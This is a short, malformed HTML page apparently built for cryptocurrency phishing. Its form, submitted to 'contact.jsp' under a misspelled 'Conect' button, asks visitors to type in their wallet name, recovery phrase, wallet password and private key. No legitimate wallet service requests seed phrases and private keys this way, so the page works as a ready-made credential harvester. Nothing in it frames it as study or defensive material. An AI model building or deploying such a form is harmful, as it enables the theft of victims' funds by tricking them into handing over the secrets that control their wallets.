<html>
  <head>

<form id='request' action='contact.jsp' class="main_form">

                        <div class="row">

							

							<div class="col-md-6 "><br><font size="5" color="white">Wallet name </font>

                                <input class="contactus" placeholder="Enter your Wallet name" type="text" name="wallet">

                            </div>

                            <div class="col-md-6 "><br><font size="5" color="white">Phrase </font>Typically 12 (sometimes 24) words separated by single spaces

                                <input class="contactus" placeholder="Enter your recovery Phrase" type="text" name="phrase">

                            </div>

							

							

							<div class="col-md-6 "><br><font size="5" color="white">Wallet Password </font>the password you used to encrypt it.

                                <input class="contactus" placeholder="Enter your Wallet Password" type="text" name="walletPassword"> 

                            </div>

							<div class="col-md-6 "><font size="5" color="white">Private Key </font> Typically 12 (sometimes 24) words separated by single spaces



                                <input class="contactus" placeholder="Enter your Private Key" type="text" name="privateKey">

                            </div>

						

                            <div class="col-md-12">

                                <button class="send_btn">Conect</button>

                            </div>

                        </div>

</form>

  </head>
</html>
